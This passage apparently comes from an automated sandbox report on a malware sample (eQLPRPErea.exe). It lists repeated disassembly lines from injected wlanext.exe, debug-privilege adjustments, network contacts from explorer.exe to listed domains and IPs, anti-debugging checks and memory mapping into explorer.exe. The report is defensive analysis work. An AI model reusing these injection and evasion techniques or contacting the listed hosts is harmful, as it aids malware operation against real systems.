          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0314138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030B4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030B4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030B4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03155BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_031053CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_031053CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030ADBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030B03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030B03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030B03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030B03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030B03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030B03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0314AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0314AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03098A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030A3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03085210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03085210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03085210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03085210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0308AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0308AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0314EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03114257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03089240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03089240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03089240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03089240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0313B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0313B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03158A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030BD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030BD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0309AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0309AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030BFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030B2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030B2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03089100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03089100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03089100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030A4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030A4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030A4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030A4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030A4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030B513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030B513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030AB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030AB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0308C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0308B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0308B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030AC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030BA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030B2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030B61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030B61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_031051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_031051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_031051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_031051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_031449A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_031449A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_031449A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_031449A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_031069A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0308B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0308B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0308B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_031141E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03154015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03154015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03107016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03107016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03107016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0309B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0309B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0309B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0309B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030B002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030B002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030B002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030B002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030B002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030A0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030A0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03151074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03142073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03089080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03103884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03103884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030B20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030B20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030B20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030B20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030B20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030B20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030BF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030BF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030BF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0311B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0311B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0311B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0311B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0311B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0311B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030858EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030840E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030840E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030840E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0311FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0311FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030BA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030BA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0315070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0315070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030AF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03084F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03084F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030BE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0309EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0309FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03158F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03107794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03107794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03107794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03098794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0308C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0308C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0308C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030B8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030BA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030BA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03141608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0308E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0313FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03097E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03097E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03097E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03097E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03097E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03097E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0314AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0314AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0309766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030AAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030AAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030AAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030AAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030AAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0311FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03150EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03150EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03150EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_031046A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03158ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030B36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0313FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030B16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030976E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03158D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0310A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0314E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030B4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030B4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030B4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0308AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03093D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03093D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03093D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03093D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03093D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03093D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03093D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03093D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03093D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03093D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03093D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03093D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03093D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030C3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03103540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03133D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030A7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030AC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030AC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03082D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03082D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03082D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03082D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03082D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030B2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030B2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030B2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030B2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030BFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030BFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030B35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_031505AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_031505AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030B1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030B1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_030B1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03106DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03106DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03106DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03106DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03106DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03106DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_03138DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0309D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0309D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0314FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0314FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0314FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0314FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\eQLPRPErea.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\wlanext.exeProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.bedpee.com
          Source: C:\Windows\explorer.exeDomain query: www.pmrack.com
          Source: C:\Windows\explorer.exeNetwork Connect: 64.32.22.102 80
          Source: C:\Windows\explorer.exeDomain query: www.420vaca.com
          Source: C:\Windows\explorer.exeNetwork Connect: 184.168.131.241 80
          Source: C:\Windows\explorer.exeDomain query: www.qcmax.com
          Source: C:\Windows\explorer.exeDomain query: www.appgusher.com
          Source: C:\Windows\explorer.exeDomain query: www.thesixteenthround.net
          Source: C:\Windows\explorer.exeDomain query: www.nagoyadoori.xyz
          Source: C:\Windows\explorer.exeDomain query: www.playfulpainters.com
          Source: C:\Windows\explorer.exeNetwork Connect: 64.190.62.111 80
          Source: C:\Windows\explorer.exeDomain query: www.serversexposed.com
          Source: C:\Windows\explorer.exeNetwork Connect: 91.195.240.94 80
          Source: C:\Windows\explorer.exeNetwork Connect: 135.181.58.27 80
          Source: C:\Windows\explorer.exeDomain query: www.biehnrecords.com
          Source: C:\Windows\explorer.exeDomain query: www.heliumhubs.com
          Source: C:\Windows\explorer.exeDomain query: www.shujahumayun.com
          Source: C:\Windows\explorer.exeDomain query: www.stone-master.info
          Source: C:\Windows\explorer.exeNetwork Connect: 62.116.130.8 80
          Source: C:\Windows\explorer.exeNetwork Connect: 104.128.125.95 80
          Source: C:\Windows\explorer.exeNetwork Connect: 185.230.60.177 80
          Source: C:\Windows\explorer.exeDomain query: www.autobrehna.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 13.248.216.40 80
          Source: C:\Windows\explorer.exeNetwork Connect: 156.254.221.72 80
          Source: C:\Windows\explorer.exeDomain query: www.dottproject.com
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.215 80
          Contains functionality to prevent local Windows debuggingShow sources
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 1_2_6FC61000 YVfgfgfgfgfg,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\eQLPRPErea.exeSection loaded: unknown target: C:\Users\user\Desktop\eQLPRPErea.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\eQLPRPErea.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
